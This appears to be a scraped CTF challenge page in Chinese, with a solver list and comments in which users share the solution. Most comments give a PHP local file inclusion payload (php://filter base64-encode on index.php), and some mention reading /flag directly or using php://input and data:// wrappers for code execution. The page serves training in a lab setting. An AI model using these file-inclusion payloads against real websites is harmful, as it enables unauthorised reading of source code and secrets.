评分(11)
解题动态
18171382569 攻破了该题 13小时前
krnxy777 攻破了该题 2天前
Wu. 攻破了该题 3天前
qq1002517 攻破了该题 4天前
麻辣鸽子头 攻破了该题 4天前
Arno_Zoffy 攻破了该题 5天前
Jasmine_Iris 攻破了该题 5天前
AioKT 攻破了该题 5天前
潭影空人心 攻破了该题 6天前
hdcc1 攻破了该题 7天前
linxingjun 攻破了该题 10天前
jaysongong 攻破了该题 10天前
violet1 攻破了该题 11天前
potato66 攻破了该题 11天前
一只小白鲸 攻破了该题 12天前
xiaoxuexue 攻破了该题 13天前
bak3l1 攻破了该题 13天前
妙龄 攻破了该题 13天前
19113115774 攻破了该题 13天前
评论
Ywctf 2月前
举报
/?file=php://filter/read=convert.base64-encode/resource=index.php
帅帅123 2月前
举报
发现参数?file= 怀疑是文件读取或者目录穿越 尝试php为协议 命令执行:php://input data://text/plain,<?php ?> 字节流编码读取: php://filter/conver.base64-encode/resource=index.php
奔跑的开开 3月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php
ok了 5月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php 秒了
VVang 5月前
举报
用php://filter包含index.php,然后base64解码得到flag
聪10011 5月前
举报
猜flag位置,file=/flag
8208240204 6月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php 然后发现==表明是base64解码得到flag
2686213396 7月前
举报
http://117.72.52.127:17540/index.php?file=php://filter/convert.base64-encode/resource=index.php,php伪协议,读取 index.php文件
zhuizhui 7月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php
17734916426 9月前
举报
index.php?file=/flag